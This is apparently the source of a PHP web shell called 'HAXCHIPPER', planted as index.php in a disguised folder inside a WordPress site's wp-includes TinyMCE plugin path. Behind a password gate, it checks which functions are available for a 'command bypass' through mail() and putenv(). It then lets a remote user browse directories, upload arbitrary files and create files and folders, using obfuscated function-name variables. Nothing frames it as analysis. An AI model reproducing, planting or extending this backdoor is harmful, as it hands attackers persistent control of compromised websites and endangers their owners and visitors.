/home/techb158/public_html/wp-includes/js/tinymce/plugins/wpeditimage/res34ca53
Edit: /home/techb158/public_html/wp-includes/js/tinymce/plugins/wpeditimage/res34ca53/index.php (31494B)
body { background: #000; color: #fff; font-family: sans-serif; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; }
.login-box { border: 1px solid #333; padding: 20px; border-radius: 10px; background: #1a1a1a; }
input[type='password'] { padding: 8px; border: 1px solid #555; background: #333; color: #fff; border-radius: 5px; }
input[type='submit'] { padding: 8px 15px; background: #53585d; color: #fff; border: none; border-radius: 5px; cursor: pointer; }
";
exit;
}
}
session_write_close();
// --- BAGIAN PENGUNCI END ---
?>
HAXCHIPPER
[ mail() :
0N ] ";
} else {
$mail = "
[ mail() : 0FF ] ";
}
if(function_exists('mb_send_mail')) {
$mbb = "
[ mb_send_mail() : 0N ] ";
}else{
$mbb = "
[ mb_send_mail() : 0FF ] ";
}
if(function_exists('error_log')) {
$errr = "
[ error_log() : 0N ] ";
}else{
$errr = "
[ error_log() : 0FF ] ";
}
if(function_exists('imap_mail')) {
$impp = "
[ imap_mail() : 0N ] ";
}else{
$impp = "
[ imap_mail() : 0FF ]
";
}
echo "
[ C0MM4ND BYP4SS! status wajib on mail putenv ]";
if (function_exists('mail')) {
echo $mail." ".$mbb." ".$errr." ".$impp;
} else {
echo $mail." ".$mbb." ".$errr." ".$impp;
}
if (function_exists('putenv')) {
echo "
[ Function putenv() : 0N ]
";
} else {
echo "
[ Function putenv() : 0FF ]
";
}
foreach ($_GET as $c => $d) $_GET[$c] = y($d);
$currentDirectory = $ril(isset($_GET['d']) ? $_GET['d'] : $rootDirectory);
$chd($currentDirectory);
$viewC0MM4NDResult = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['filetos'])) {
$target_file = $currentDirectory . '/' . $bs($_FILES["filetos"]["name"]);
if ($mup($_FILES["filetos"]["tmp_name"], $target_file)) {
echo "
F1L3 " . $htm($bs($_FILES["filetos"]["name"])) . " UPL04D SUCCESS
";
} else {
echo "
S0RRY, TH3R3 W4S AN ERR0R UPLOADING YOUR F1LE.
";
}
} elseif (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) {
$ff = $_POST['folder_name'];
$newF0LD3R = $currentDirectory . '/' . $ff;
if (!file_exists($newfolder)) {
if ($mek($newF0LD3R) !== false) {
echo '
F0LD3R CR34T3D SUCCESSFULLY!';
}else{
echo '
ERR0R: F4ILED T0 CR34T3 F0LD3R!';
}
}
} elseif (isset($_POST['file_name'])) {
$fileN4M3 = $_POST['file_name'];
$newF1L3 = $currentDirectory . '/' . $fileN4M3;
if (!file_exists($newF1L3)) {
if ($fpc($newF1L3, '') !== false) {
echo '
F1L3 ' . $fileN4M3 .' CR34T3D SUCCESSFULLY!';
$fileToV13W = $newF1L3;
if (file_exists($fileToV13W)) {
$fileContent = $fgc($fileToV13W);
$viewC0MM4NDResult = '
R3SULT: ' . $fileN4M3 . '